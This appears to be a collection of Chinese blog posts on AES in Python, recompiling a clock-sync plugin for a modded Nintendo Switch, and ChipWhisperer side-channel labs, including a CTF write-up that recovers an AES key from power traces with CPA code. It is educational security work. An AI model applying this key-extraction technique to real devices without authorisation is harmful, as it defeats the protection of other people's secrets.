• 接着来看这个，下图B1，B2，B3，B0经过S后得到B1'，B2'，B3'，B0'，S代表S-Box，也就是说这一步操作是将word的每个字节分别经过S-Box替换得到新的word

  

• 最后是这个B1'，B2'，B3'，B0'与RCj，0，0，0异或得到g函数最终输出w'，这个RCj代表什么呢？这个代表着AES的密钥扩展的轮常量Rcon（这些值好像与有限域GF(2^8）上的乘法有关），这个AES轮常量也是word类型数据，而且每个Rcon的右边3个字节总为0，只有第一个字节会随着循环发生改变。Rcon的值为"01 02 04 08 10 20 40 80 1B 36"（有些AES实现中Rcon常量很多，但实际上AES密钥扩展用到的就只有这些）

  

  

• 回过头来再看密钥扩展函数的为代码就很容易理解了，第一个循环作用实际上就是按列取密钥数据得到wi，第二个循环就是密钥扩展的主逻辑了，RotWord代表将word的4个字节循环左移1位，SubWord代表将word的每个字节进行S-Box替换，Rcon代表着轮常量数组

  

• 接下来使用python实现AES密钥扩展了，首先定义sbox和i_sbox。sbox和i_sbox相当于互为逆运算，一个字节使用sbox进行字节替换后再用i_sbox进行字节替换得到的还是它本身，反过来也一样。密钥扩展算法里面只用到sbox，加密算法也用到了sbox，解密则用的为i_sbox

  

  

• 接着定义轮常量Rcon，注意第0个0x8d实际上并没有用到，这里加上这个主要是后面取值方便，参考：https://github.com/kokke/tiny-AES-c的密钥扩展实现，对于AES 128用到了10个Rcon值，192只用到了其中的8个，256则只用到了7个，Rcon[0]在AES中没有被使用

  

  

• 接下来编写sub_word函数，这里为了方便将word直接视为4字节的数组，而不是视为一个32位的整数，代码很简单，就是将word的每个字节通过sbox查表方式替换得到新的字节，最后返回替换后的结果

  

• 类似地可以按以下方式实现rot_word，循环左移1个字节，可以通过取余数的方式来实现

  

• 最后是异或函数xor，将a，b中的每个字节异或得到输出

  

• 定义了上面的运算函数后，就可以编写密钥扩展函数了，总体函数如下

  

• 首先解释下前面部分的作用，因为AES有128、192、256位数之分，所以先根据输入参数判断选用的是哪种，如果为128则定义密钥长度为klen=16字节，nk=4（nk代表原始密钥有多少个4字节的word，nk与轮常量Rcon取值有关），扩展后的密钥长度为176（16+10*16）。因为标准AES的密钥扩展后的密钥前klen字节为原AES密钥，所以轮密钥前klen字节只需复制原来的密钥即可

  

• 接下来看下面部分，"//"代表只保留整数的除法（python中单"/"除法，如果有小数会保留小数），temp按照前面的先取wi-1，如果i为nk的倍数，那么就进行先rot_word，再sub_word，最后再与轮常量rcon_t异或，从前面可知rcon_t数组后3个元素固定为0，第0个元素通过i//nk来确定。最后wi-nk与wi-1异或（因为要扩展到192和256，所以不是wi-4而是wi-nk）

  • 这里需要注意的是如果是AES 256，那么当i%nk == 4时，temp还要再进行一次sub_word运算，这个也是从tiny-AES-c中的实现得知，实际上最前面的密钥扩展描述的是AES 128的密钥扩展，所以这里需要补充一下AES 256密钥扩展

  

• 接下来测试AES 128密钥扩展，以16个00字节为例，密钥扩展后结果如下，这个00得到的密钥扩展结果还是挺有意义的，有时判断一个算法是否为标准AES实现，可以首先通过对比同样为16个00字节密钥时，密钥扩展输出是否与标准AES一致。在实现AES时，也可以通过这种方式，来对比标准AES的结果，看自己实现的是否正确。

  

• 接着来看AES加密部分，同样先来看张图，图来自https://www.brainkart.com/article/The-AES-Encryption-Algorithm_9558/

  

• AES加密每轮循环可以分为SubBytes、ShiftRows、MixColumns、AddRoundKey四个部分（除最后一轮外，最后一轮没有MixColumns）

• 先来看前两个SubBytes和ShiftRows，这两个顺序其实可以对调（结果一样），SubBytes就是将输入的16个字节每个字节经过sbox替换得到新的16字节

  

• ShifRows有个形象的图，如下图所示，ShifRows就是第0行不变，第1行循环左移1字节，第2行循环左移2字节，第3行循环左移3字节，参考：http://www.moserware.com/2009/09/stick-figure-guide-to-advanced.html

  

• 接着是MixColumns，列混淆有点复杂，右乘一个固定矩阵，其中的运算与有限域GF(2^8)的四则运算有关，参考：https://www.brainkart.com/article/Advanced-Encryption-Standard(AES)-Transformation-Functions_8409/

  

  

• 最后是AddRoundKey，AddRoundKey比较容易理解，就是将当前状态state每个字节与下一轮密钥的每个字节异或

• AES解密的话则是所有操作反过来，每轮循环先AddRoundKey（因为是异或，所以可以用同一个函数），再InvMixColumns，再InvShifRows，最后InvSubBytes，这三个都是与加密的3个变换是相反的

• 接着可以编写Python代码了，首先是最容易实现的SubBytes和InvSubBytes，只需将每个字节通过查表替换即可

  

• 这里再定义一个矩阵转置函数transpose，之所以要这个函数，就是前面所提到的AES的矩阵是Column-major order，而C语言、Python这些编程语言的数组其实是Row-major order的，所以需要对密钥、输入输出都进行矩阵转置才能与标准AES一致，这个transpose函数用了个最简单粗暴的方法实现

  

• 接着是AddRoundKey，这里接收3个参数，分别为当前循环数cur_round，加解密状态state，轮密钥数组round_key，每次AddRoundKey只需将state与相对应的轮密钥异或即可

  

• 接着是ShiftRows和InvShiftRows，这里同样选择最简单粗暴的方式来实现

  

• 接着是最个人认为AES最难以理解的就是MixColumns和InvMixColumns，这里有限域GF(2^8)乘法直接抄https://gist.github.com/raullenchai/2920069的实现

  

• MixColumns，按照下图的右乘固定矩阵方式，实现如下

  

  

• InvMixColumns，按照下图的右乘另一个固定矩阵方式，实现如下

  

  

• 从下图可以看出，所用到的两个固定矩阵是互为逆矩阵，所以可以用来加解密

  

• 有了上面这些就可以实现AES加密函数了，如下图所示

  

• 首先来解释前面部分，首先判断key是否为字符串，如果是那么将之转化为bytes类型。然后是判断是否有bits参数，如果没有则根据密钥key长度自动判断bits的值，然后就是调用前面实现的密钥扩展函数key_expansion来生成轮密钥数组，并计算加密循环次数

  

• 接着同样先判断输入是否为字符串，如果是那么先将之转化为bytes类型。然后是将输入进行矩阵每16个字节进行转置，输出也是进行转置，然后就是按每轮循环SubBytes、ShiftRows、MixColumns、AddRoundKey进行（最后一轮循环没有MixColumns）

  

• AES解密跟加密的过程刚好反过来，AddRoundKey的初始轮数是最后一轮，每轮循环的顺序是AddRoundKey、InvMixColumns、InvShiftRows、InvSubBytes

  

• 测试加解密，并与pycryptodome库的结果相对比来判断是否正确实现

  

• 至此，成功用Python实现了AES，本文完整代码：AES.ipynb

• switch 硬破后，一般都把任天堂相关的域名IP屏蔽了，所以就不能自动联网校准时间

• 时间久了，switch的时间就会与标准时间偏差很大，使用Tinfoil下载就有可能会出现下面的错误，这种情况手动设置时间一般与无济于事

  1 2 3

  SSL Connection failed. Your system clock is likely incorrect. Please ensure your system date time is set correctly.

• 这时候就可以使用一个插件来同步时间：https://github.com/nedex/QuickNTP.git

• 但QuickNTP默认的几个服务器，有时候也会出现连不上情况

• 接下来介绍，如何将QuickNTP默认的NTP服务器替换为国内NTP服务器并重新编译.ovl文件

开始

• 首先直接git clone下来

  1	git clone https://github.com/nedex/QuickNTP.git

• 需要注意的是，QuickNTP的libs目录下引用了另一个github仓库，默认是不会被一起clone

  

  

• 所以需要手动clone https://github.com/WerWolv/libtesla.git并替换libs目录下的libtesla

  1 2 3

  cd libs rm -r libtesla git clone https://github.com/WerWolv/libtesla.git

• clone好后，直接make，会报下面的错，原因是缺少devkitPro

  1	Makefile:6: *** "Please set DEVKITPRO in your environment. export DEVKITPRO=<path to>/devkitpro". Stop.

  

• 安装devkitPro有多种方式，这里选择最省事的，用docker拉取官方镜像，官方docker镜像链接https://hub.docker.com/u/devkitpro/

  

  

• 可以点击查看每个镜像的用途，可以看到，devkitpro/devkita64是用于Nintendo Switch的开发环境，所以这里直接选这个即可

  

• 拉取docker镜像

  1	docker pull devkitpro/devkita64

• 运行镜像，使用-v参数，将主机的QuickNTP所在目录映射到docker容器的/data目录

  1 2	# 将/Users/cc/github替换为QuickNTP所在目录，可将/data替换为你想要的目录 docker run -itd --name devkita64 -v /Users/cc/github:/data devkitpro/devkita64

• 进入容器shell

  

  1	docker exec -it devkita64 /bin/bash

• 进入/data/QuickNTP目录

  

• 运行make，即可编译得到QuickNTP.ovl

  

• 如果make报没有"tesla.hpp"文件错误，那么就需要检查QuickNTP/libs/libtesla/目录下是否为空，若为空，说明是前面说的clone没有把github的子仓库一起clone下来的问题，只需要clone下libtesla即可

  1 2 3 4 5 6

  /data/QuickNTP/source/main.cpp:2:10: fatal error: tesla.hpp: No such file or directory 2 | #include <tesla.hpp> | ^~~~~~~~~~~ compilation terminated. make[1]: *** [/opt/devkitpro/devkitA64/base_rules:14: main.o] Error 1 make: *** [Makefile:170: build] Error 2

  

• 可以正常编译了，那么接下来就是修改默认的NTP服务器，替换为国内的NTP服务器

• QuickNTP的服务器列表在servers.hpp中，如下图，两个字符串数组，分别为Title和域名的列表

  

• 按照格式，替换为国内常见的NTP服务器，如下图所示：

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

  #include <initializer_list> #include <string> std::initializer_list<std::string> NTPSERVERS[2] = { { "China NTP 1", "China NTP 2", "China NTSC", "China Edu", "Aliyun", "Tencent", }, { "cn.pool.ntp.org", "cn.ntp.org.cn", "ntp.ntsc.ac.cn", "edu.ntp.org.cn", "ntp1.aliyun.com", "time1.cloud.tencent.com", }};

  

• 保存，然后重新make下，即可生成修改后的QuickNTP.ovl文件

• 使用QuickNTP.ovl插件，需要https://github.com/WerWolv/Tesla-Menu，下载最新Tesla-Menu的releases并复制到switch SD卡的/switch/.overlays目录下即可

• 再将编译好的QuickNTP.ovl也复制到switch SD卡的/switch/.overlays目录下

• 同时按住switch 的" L" 和 "▼" 然后往下戳右摇杆，即可调出Tesla-Menu，然后选择QuickNTP即可开始设置时间

  

• 如下图所示，选择一个服务器，并点击Sync time即可同步时间，并且可以看到服务器列表成功替换为自定义的列表，出现Syced with xxx后就可以重启switch，这样tinfoil就不会报SSL 时间错误

  

• 当然也可以通过QuickNTP的User-set time把自己switch系统设置中手动设置的时间当作标准时间

• 本文编译的QuickNTP.ovl文件下载链接:QuickNTP.ovl

• QuickNTP原版下载链接:https://github.com/nedex/QuickNTP/releases/latest

• 如果只是替换QuickNTP默认服务器列表，其实不用编译也可以，直接使用16进制编辑器打开QuickNTP.ovl，搜索并将域名字符串替换掉即可，这里主要是想了解下如何编译switch的一些插件

• 新版QuickNTP修改服务器列表方法与上面差不多，修改servers.hpp即可，更新一个最新编译的文件：QuickNTP_1.2.8.ovl

• 最近学习chipwhisperer时，遇到了点问题，运行import chipwhisperer.common.api.lascar as cw_lascar会报两个错误"Unable to import LASCAR"和"NameError: name 'Container' is not defined"

  

• 一顿搜索后，按照这个链接找到了解决方法：https://forum.newae.com/t/lascar-lab5-1-sca101-cpa-attacks-in-practice/2816

• 可以看到官方说需要去clonehttps://github.com/Ledger-Donjon/lascar，并手动安装。LASCAR跟ChipWhisperer Analyzer功能是一样的，官方推荐在分析大的数据集时使用LASCAR，因为它的实现比ChipWhisperer Analyzer更快

  

• github上查看lascar官方安装教程，可以看到很简单clone下来后运行python3 setup.py install --user即可，"--user"参数是给当前用户安装。

  

• 所以解决上述错误，只需执行如下命令即可

  git clone https://github.com/Ledger-Donjon/lascarcd lascarpython3 setup.py install --user

• 如下图，重启jupyter notebook后，重新运行不再报错

  

参考链接

• https://forum.newae.com/t/lascar-lab5-1-sca101-cpa-attacks-in-practice/2816
• https://github.com/Ledger-Donjon/lascar

• 使用前面学习了那么多侧信道攻击的内容，是时候实战一波了

• 本文这道题来自https://github.com/Riscure/Rhme-2016的piece_of_scake，下图为这题的提示信息

  

• 本文大部分内容基于这个视频中对这道题的解法，很不错的视频，值得一看：https://www.youtube.com/watch?v=FktI4qSjzaE&list=PLhixgUqwRTjwNaT40TqIIagv3b4_bfB7M&index=14

• 与上面提到的视频不同，这里为了方便起见使用的硬件为用面包板构造的Arduino最小系统，这样做的好处在于接电阻、接线和拆器件方便

• 最近更新了关于这道CTF题的另一篇文章，可供参考：CW308T-AVR使用笔记

开始

• 将上一篇中构造的Arduino直接拿过来用，但有个地方需要稍作调整，将一个20Ω的电阻与给Atmega328P 供电的GND串联，用于给ChipWhisperer-Lite测电压

• 为什么不连Vcc而连GND？因为实际使用中发现貌似无法避免ChipWhisperer-Lite GND与供电端的GND相连，这样相连的情况下把20Ω电阻接Vcc上，再用ChipWhisperer-Lite测电压，就会出现短路，这种情况貌似有个专业术语叫"Ground Loop"

• 如下图，把ChipWhisperer-Lite当作电压表，把Atmega328P和其它器件整体看成一个大电阻，如果把20Ω接在Vcc端，并且ChipWhisperer-Lite又与Atmega328P共地的情况下，就会使Atmega328P被短路了。实测按下图接法，芯片无法正常工作且20Ω电阻将发烫。

  

• 因为找不到好的解决方法，于是改为20Ω电阻接在电源的GND出，更改后的电路示意图，如下图所示，这样就避免了将Atmega328P芯片短路，电阻也不会发烫

  

• 下图为实际电路接线图，chipwhisperer-lite用一个sma转鳄鱼夹将一个20Ω来测电阻两端电压（试过用sma转bnc连接示波器的x1探头，但是效果不太行，可能是阻抗的问题）

  

• 下图为chipwhipserer-lite中引出来的线，这里只引出来了TIO4（chipwhipserer-lite正面朝上的情况下，20PIN下面的那排左数第3针脚即为TIO4），用于设置触发信号的探针

  

• 什么是TIO4？- 这得跟chipwhisperer的官方文档有关，chipwhisperer-lite主要有TIO1、TIO2、TIO3、TIO4这四个针脚可用于设置触发信号（其中TIO1和TIO2默认为Rx和Tx，TIO4默认为触发信号的输入），更多细节请看官方文档https://chipwhisperer.readthedocs.io/en/latest/scope-api.html

• 如下图所示，chipwhisperer-lite的背面有TIO1、TIO2、TIO3、TIO4的定义，所以只有用万用表量一下，看这4个针脚跟20PIN座子的哪几个针脚相连即可知道，哪个是Rx、哪个是Tx和哪个是触发信号的输入

  

• 接下来为Atmega328p刷入硬件CTF的题目，如果搭建的最新系统可以自动Reset并正常通过USB转UART上传程序，那么可以用下面的命令上传（只需修改USB转UART设备）

  1	avrdude -v -c arduino -p atmega328p -P /dev/cu.wchusbserial1410 -b115200 -u -V -U flash:w:piece_of_scake.hex

• 如果不能通过USB转UART上传程序，那么可以用上一篇的Arduino Uno当作ISP编程器，为Atmega328p烧录固件

  1	avrdude -p m328p -P /dev/cu.usbmodem14201 -c avrisp -b 19200 -U flash:w:piece_of_scake.hex

• 上传好固件后，就可以先来测试，这里使用python的pyserial包来使用串口

  1	pip install pyserial

• 跟据题目提示，使用"e"+ 16 bytes即可加密，

  

• 如下图所示，设置好选用的设备名称和波特率即可用write和read方法来与芯片进行串口通信，可以看到使用"e"+16个0x01加密返回结果为"5cf473073f0a0940be290224ca495b90"。如果格式不对将没有任何响应

  

• 实际使用过程中可以发现连接在Atmega329P的19引脚和22引脚的二极管会在正确发送指令后亮一下，因此可以用chipwhipserer的TIO4与Atmega329P19引脚相连来作为触发信号的输入

• 设置好触发信号后，就可以开始写代码，用chipwhipserer-lite来抓取能量迹，正式开始之前，建议把面包板上的电容都去掉（因为电容有滤波效果，所以会影响抓取的能量迹波形）。而且建议给Arduino最小系统独立供电（串联的电阻较大时，靠笔记本供电，会电压不足），笔记本电脑拔掉充电头（电脑充电状态会有杂峰影响）

• 接下来照猫画虎，将之前侧信道攻击学习的前面部分的代码复制过来，并稍作修改，如下图所示，这里还是使用USB转UART作为串口通信（虽然chipwhisperer-lite有Rx和Tx，但是chipwhisperer-lite是3.3v的，而atmega328p是5v的，所以两者不能直接通信）

  1 2 3 4 5 6 7 8 9 10 11 12

  import serial SCOPE="OPENADC" PLATFORM="CWLITEXMEGA" CRYPTO_TARGET="TINYAES128C" VERSION="HARDWARE" %run "../../Setup_Scripts/Setup_Generic.ipynb" s=serial.Serial('/dev/cu.wchusbserial1410', 19200, timeout=0.5) proj = cw.create_project("test", overwrite=True)

  

• 接着设置chipwhisperer-lite的触发信号输入引脚，触发模式，采样频率等，具体可查看官方文档，下面的设置为使用TIO4引脚作为触发信号，单次采样5000个点的数据，还有采样频率"clkgen_x4"（如果为"clkgen_x1"，那么将会用更低的频率采样）

  1 2 3 4 5 6 7 8 9 10 11

  # scope.adc.basic_mode = "falling_edge" # scope.adc.basic_mode = "high" scope.adc.samples = 5000 scope.clock.adc_src = "clkgen_x4" scope.trigger.triggers = "tio4" scope.adc.offset=0 scope.adc.presamples=0

  

• 接着是，开始抓取能量迹，第一个key可以随意设置（主要用于后面画图高亮显示，如果一开始不知道真正key可以用16个00代替）

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39

  import chipwhisperer from tqdm import tnrange import numpy as np import time reset_target(scope) ktp = cw.ktp.Basic() key, text = ktp.next() # key=bytes([0]*16) key=bytes([0xaf, 0x23, 0xd5, 0x45, 0xa0, 0xea, 0xe6, 0xa0, 0x74, 0x65, 0x96, 0xca, 0xce, 0x51, 0xf0, 0xf7]) target.simpleserial_write('k', key) trace_array = [] textin_array = [] textout_array=[] N = 500 for i in tnrange(N, desc='Capturing traces'): scope.arm() s.write(b"e"+bytes(text)) ret = scope.capture() r=s.read_all() while len(r)==0: r=s.read_all() if ret: print("Target timed out!") continue trace = scope.get_last_trace() print(r.hex()) trace_array.append(trace) proj.traces.append(chipwhisperer.common.traces.Trace(trace, text, r,key)) textin_array.append(text) key, text = ktp.next() proj.save()

  

• 抓完能量迹后，可以话出一条能量迹，查看效果，如下图所示

  1 2 3 4 5 6

  %matplotlib notebook import matplotlib.pylab as plt plt.figure() plt.plot(trace_array[0]) plt.show()

  

• 最后就是执行CPA攻击，可以看到最终结果为"0xaf, 0x23, 0xd5, 0x45, 0xa0, 0xea, 0xe6, 0xa0, 0x74, 0x65, 0x96, 0xca, 0xce, 0x51, 0xf0, 0xf7"

  1 2 3 4 5 6 7

  import chipwhisperer as cw import chipwhisperer.analyzer as cwa leak_model = cwa.leakage_models.sbox_output attack = cwa.cpa(proj, leak_model) cb = cwa.get_jupyter_callback(attack) results = attack.run(cb, 10)

  

• 验证密钥是否正确，如下图所示，使用标准AES，用侧信道攻击得到的密钥，加密同样的数据[1]*16得到的结果同样为"5cf473073f0a0940be290224ca495b90"，说明"0xaf, 0x23, 0xd5, 0x45, 0xa0, 0xea, 0xe6, 0xa0, 0x74, 0x65, 0x96, 0xca, 0xce, 0x51, 0xf0, 0xf7"是正确的AES密钥

  1 2 3 4 5 6 7

  from Crypto.Cipher import AES key=bytes([0xaf, 0x23, 0xd5, 0x45, 0xa0, 0xea, 0xe6, 0xa0, 0x74, 0x65, 0x96, 0xca, 0xce, 0x51, 0xf0, 0xf7]) aes=AES.new(key, AES.MODE_ECB) data=bytes([1]*16) aes.encrypt(data).hex()

  

• 至此成功利用侧信道攻击解决了这道CTF

其他

• 如果不去掉电容会怎样？- 如下图，抓取的波形的振幅会减小，恢复正确的密钥需要的能量迹更多，去掉电容只需200条左右能量迹即可恢复正确密钥，但不去掉密钥则需要500条左右甚至更多

  

• 为什么串联20Ω大小的阻值，其它大小可以吗？- 理论上可以，试过1Ω的电阻（但效果不行），试过50Ω（分压太明显，需要输入更多的电压，大概6.8v输入才能稳定正常工作，20Ω则只需5.5v输入）

总结

• 利用侧信道攻击成功解了一道硬件CTF题
• 通过自己构建电路，才知道实施一次侧信道攻击不是一件容易的事

• 最近为了方便折腾硬件CTF，于是准备用Atmega328P-PU搭建Arduino最小系统
• 需要用到的器件
  • 面包板 x1
  • Atmega328P-PU x 1
  • USB转UART x1（建议有DTR引脚的，可以用来自动Reset）
  • 22pF 陶瓷电容 x2
  • 16 MHz晶振
  • Arduino uno或者Arduino mini x1（用于给Atmega328P-PU芯片烧录bootloader）
  • 导线（杜邦线，面包板线）
  • 1µF (100nF) 陶瓷电容x2（可选）
  • 10 kΩ电阻（可选）
  • 二极管（可选）

开始

• Atmega328P-PU的引脚定义如下图所示：

  

• Arduino最小系统电路图

  

• 接下来根据上面的电路图来构造arduino最小系统，下图为使用的配件

  

• 首先，如下图所示，将16MHz的晶振连接atmega328p的第9和第10引脚

  

• 接着，如下图所示，用两个22 pF的陶瓷电容分别连接atmega328p的8-9和8-10（其中8脚为GND）

  

• 接着，如下图所示，将二极管的正极连接atmega328p的19引脚，负极连接22引脚（GND）

  

• 接着，如下图所示，将7脚（Vcc）和8脚（GND）引出，以便后面接入电源供电

  

• 接着如下图所示，在7脚（Vcc）和8脚（GND）之间连接一个1µF（100nF）的陶瓷电容

  

• 接着如下图所示，用10kΩ的电阻将1脚（Reset）与7脚（Vcc）相连，用一个1µF电容将1脚引出（用于后面与USB转UART串口的DTR引脚相连）

  

• 如下图所示，将USB转UART的GND和Vcc分别与atmega328p的GND和Vcc相连（注意需要5v输出，如果串口输出电压不对，可以选择给atmega328p独立供电，uart与atmega328p只连GND）

  

• 接着如下图所示，将UART的Tx与atmega328p的2脚（Rx）相连，UART的Rx与atmega328p的3脚（Tx）相连

  

• 接着如下图所示，将UART的DTR引脚与上面的1µF陶瓷电容与1脚串联

  

• 最小系统的电路至此构建完毕，但是由于此时atmega328p芯片没有bootloader程序，所以不能直接跑任何东西，需要先刷入bootloader程序

• 下面以Arduino Uno为例（Arduino mini等其它设备也可以），为atmega328p烧录bootloader

• 如下图所示，将Arduino Uno的10脚直接与atmega328p的1脚相连（这里不需要串联电容），将Arduino uno的11、12、13引脚依次与atmega328p的17、18、19引脚相连

  

• 将Arduino Uno和USB转UART连接到电脑（为atmega328p供电，可以独立供电）

• 如下图所示，打开ArduinoIDE，选择 文件 > 示例 > ArduinoISP，打开一个示例文件

  

• 接着选择 工具 > 开发板 > Arduino Uno

  

• 接着选择 工具 > 端口 > xxxx (Arduino Uno)，选中Arduino Uno设备

  

• 选择 项目 > 上传（或者左上角上传按钮上传），将ArduinoISP上传到Arduino Uno，这样就可以用Arduino Uno来当作编程器为atmega328p烧录bootloader了

  

  

• 接着选择 工具 > 编程器 > Arduino as ISP

  

• 最后，如下图选择 工具烧录引导程序，等待烧录完成，即可为atmega328p刷入bootloader

  

  

• 断开Arduino Uno与电脑连接，拔掉Arduino Uno在面包板上的线恢复至最小系统电路图状态，如下图所示

  

• ArduinoIDE中重新选择端口，选中你的USB转UART设备（不同USB转UART设备显示不一样），如下图

  

• 选择 文件 > 示例 > Basics > Blink打开一个示例项目

  

• 选择上传，此时不出意外，即可使用USB转串口给构造的Arduino最小系统上传一个程序

  

  

• 最终运行效果，如下图所示，二极管将每隔一段时间亮一次

  

结语

• 网上搜索了很多Arduino最小系统的相关教程，折腾了挺久，这里将我个人觉得比较好的方案记录下来
• 下一篇将基于这个最小系统，来解一道硬件CTF的题

参考链接

• 【arduino！】给你的ATmega328P烧录引导程序
• https://www.geek-workshop.com/thread-136-1-1.html

• 本篇将继续跟随chipwhisperer-jupyter sca101的教程来学习使用ChipWhisperer Analyzer提供的API来进行相关性能量分析（CPA）攻击

  

开始

• 最开始的代码，作用依旧是编译目标板固件并刷入，然后抓取能量迹

  

  

• 直接进入正题，python中使用ChipWhisperer Analyzer需要先导入包

  1	import chipwhisperer.analyzer as cwa

  

• 然后，这个analyzer的方便之处在于，像之前分析AES时用到的SBox模型，analyzer都给封装好了，只需在analyzer的leakage_models模块下选择一个模型即可，一行代码搞定（非常方便）

  1	leak_model = cwa.leakage_models.sbox_output

  

• 同样地，进行CPA攻击，也只需一行代码初始化

  1	attack = cwa.cpa(proj, leak_model)

  

• 可以通过print(attack)来查看设置信息

  

• 同样地，开始执行CPA攻击也是执行一行代码即可

  1	results = attack.run()

  

• 查看结果，如下图所示，可以看到，利用chipwhipserer analyzer提供的API，大大减少了代码量，非常地方便

  

• 接着的提示信息是说，CPA攻击的返回结果可以调用find_maximums函数来获得全部信息

  

• 可以利用pandas的dataframe来查看find_maximums的结果

  1 2 3 4

  import pandas as pd stat_data = results.find_maximums() df = pd.DataFrame(stat_data).transpose() print(df.head())

  

• 甚至可以dataframe的.style方法来自定义显示数据，如下图，可以将真实的Key用红色高亮显示

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

  key = proj.keys[0] def format_stat(stat): return str("{:02X}<br>{:.3f}".format(stat[0], stat[2])) def color_corr_key(row): global key ret = [""] * 16 for i,bnum in enumerate(row): if bnum[0] == key[i]: ret[i] = "color: red" else: ret[i] = "" return ret df.head().style.format(format_stat).apply(color_corr_key, axis=1)

  

• 接着的提示信息是说，ChipWhisperer Analyzer使用上一篇中提到的“可以实时更新的”相关性计算，这意味着，我们可以从攻击过程获取反馈信息。可以通过定义一个callback函数，并将callback函数传递给attack.run函数，以及传递一个数（每隔多少能量迹反馈一次）来实现实时反馈信息。

  1 2 3 4 5 6 7 8 9 10 11 12

  from IPython.display import clear_output import numpy as np def stats_callback(): results = attack.results results.set_known_key(key) stat_data = results.find_maximums() df = pd.DataFrame(stat_data).transpose() clear_output(wait=True) display(df.head().style.format(format_stat).apply(color_corr_key,axis=1)) results = attack.run(stats_callback, 10)

  

• 运行后，可以看到整个cpa攻击过程中排在前5的相关系数最大的key的变化，非常地直观！

  

• 另外analyzer还提供了一个默认的jupyter的callback，只需要3行代码就可以实现跟上面一样的效果

  1 2 3

  import chipwhisperer as cw cb = cwa.get_jupyter_callback(attack) results = attack.run(cb, 10)

  

• analyzer还提供了一个生成可以用于画图数据的函数analyzer_plots

  

总结

• ChipWhisperer Analyzer是一个可用于侧信道攻击非常强大的python库，通过ChipWhisperer Analyzer可以极大方便我们完成侧信道攻击
• ChipWhisperer Analyzer还有很多API需要去学习研究

• 本篇将继续跟随chipwhisperer-jupyter sca101的教程来学习比差分能量分析（Differential Power Analysis, DPA）更强大的相关性能量分析（Correlation Power Analysis, CPA）

• 在之前的DPA学习中为了恢复完整的AES密钥，需要抓取了大量的能量迹（几千条），而这里使用CPA只需要50条能量迹即可恢复完整的AES密钥，如此足矣可见这个方法的强大之处

  

开始

• 老规矩，将硬件的部分复制到MAIN中执行

  

• 抓取50条能量迹，如果是NANO则需要200条

  

• 画出单条能量迹，应该可以看到形如下图的峰形

  

• 这里提示我们复制前几篇用到的AES模型代码和计算Hamming Weight的代码

  

• 按照提示，复制并运行即可

  

• 接下来的提示是我们开发自己的相关系数算法（虽然有很多库可以直接计算，但是用代码实现数学算法是一个实用的技能）

  

• 对于长度为N的数据集X和Y，其相关系数的计算公式为$$r = \frac{cov(X, Y)}{\sigma_X \sigma_Y}$$

  • $cov(X, Y)$ 为X和Y的协方差，可按以下公式计算：

    $$cov(X, Y) = \sum_{n=1}^{N}[(Y_n - \bar{Y})(X_n - \bar{X})]$$

  • $\sigma_X$ 和 $\sigma_Y$ 为两个数据集的标准差，可按以下公式计算：

    $$\sigma_X = \sqrt{\sum_{n=1}^{N}(X_n - \bar{X})^2}$$

• 为了实现代码计算相关系数，首先可以分模块实现，如：实现计算平均值的函数mean、实现计算标准差的函数std_dev、实现计算协方差函数cov。可以用**np.sum(X, axis=0)**来替换所有求和符号$\sum$

• 按照提示，可以实现以下3个函数

  

• 接着运行检查函数，查看mean、std_dev、cov三个函数是否正确实现

  

• 紧接着往下运行可以看到很多提示信息

  

• 根据提示，补全代码后运行，可以看到AES密钥第一个字节的猜测结果为"0x2b"，相关系数为0.82

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

  maxcpa = [0] * 256 # we don't need to redo the mean and std dev calculations # for each key guess t_bar = mean(trace_array) o_t = std_dev(trace_array, t_bar) for kguess in range(0, 256): hws = np.array([[HW[aes_internal(textin[0],kguess)] for textin in textin_array]]).transpose() hw_bar = mean(hws) o_hw = std_dev(hws, hw_bar) hw_cov = cov(trace_array,t_bar, hws, hw_bar) cpaoutput = hw_cov/(o_t*o_hw) maxcpa[kguess] = max(abs(cpaoutput)) guess=np.argmax(maxcpa) guess_corr=maxcpa[guess] print("Key guess: ", hex(guess)) print("Correlation: ", guess_corr)

  

• 如下图，可以看到，有个判断是否正确猜测AES密钥第一个字节的代码块，"0x2b"为实际AES密钥的第一个字节

  

• 接着根据提示补全代码，自动判断AES密钥所有16个字节

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

  t_bar = np.sum(trace_array, axis=0)/len(trace_array) o_t = np.sqrt(np.sum((trace_array - t_bar)**2, axis=0)) cparefs = [0] * 16 #put your key byte guess correlations here bestguess = [0] * 16 #put your key byte guesses here for bnum in range(0, 16): maxcpa = [0] * 256 for kguess in range(0, 256): hws = np.array([[HW[aes_internal(textin[bnum],kguess)] for textin in textin_array]]).transpose() hw_bar = mean(hws) o_hw = std_dev(hws, hw_bar) hw_cov = cov(trace_array,t_bar, hws, hw_bar) cpaoutput = hw_cov/(o_t*o_hw) maxcpa[kguess] = max(abs(cpaoutput)) guess=np.argmax(maxcpa) guess_corr=maxcpa[guess] bestguess[bnum]=guess cparefs[bnum]=guess_corr print("Best Key Guess: ", end="") for b in bestguess: print("%02x " % b, end="") print("\n", cparefs)

• 运行结果如下图所示，使用CPA成功恢复了完整的AES密钥"2b 7e 15 16 28 ae d2 a6 ab f7 15 88 09 cf 4f 3c"

  

• 最后可以看到如下提示信息，大意是有个新公式可以用来实时的计算更新相关系数，这个方法会在下一个教程中使用

  

总结

• 学习了如何简单用python代码实现相关系数的计算
• 学习了如何利用相关系数能量分析和少量能量迹来恢复AES密钥

• 本篇将继续跟随chipwhisperer-jupyter sca101的教程来学习，汉明重量和能量消耗之间的关系

  

开始

• 同样Lab 4_1 - Power and Hamming Weight Relationship有硬件和模拟之分，这里同样选择将HARDWARE的内容复制到MAIN中执行

  

• 这里根据提示只修改PLATFORM为"CWLITEXMEGA"（当然根据提示"CWLITEXMEGA"还可以修改CRYPTO_TARGET）

  

• 前面的代码作用依旧是编译目标板的固件并刷入，之间运行即可

  

• 接着代码是抓取1000条能量迹，同样运行即可

  

• 接着根据提示，复制前两篇用到的AES模型到此处执行即可

  

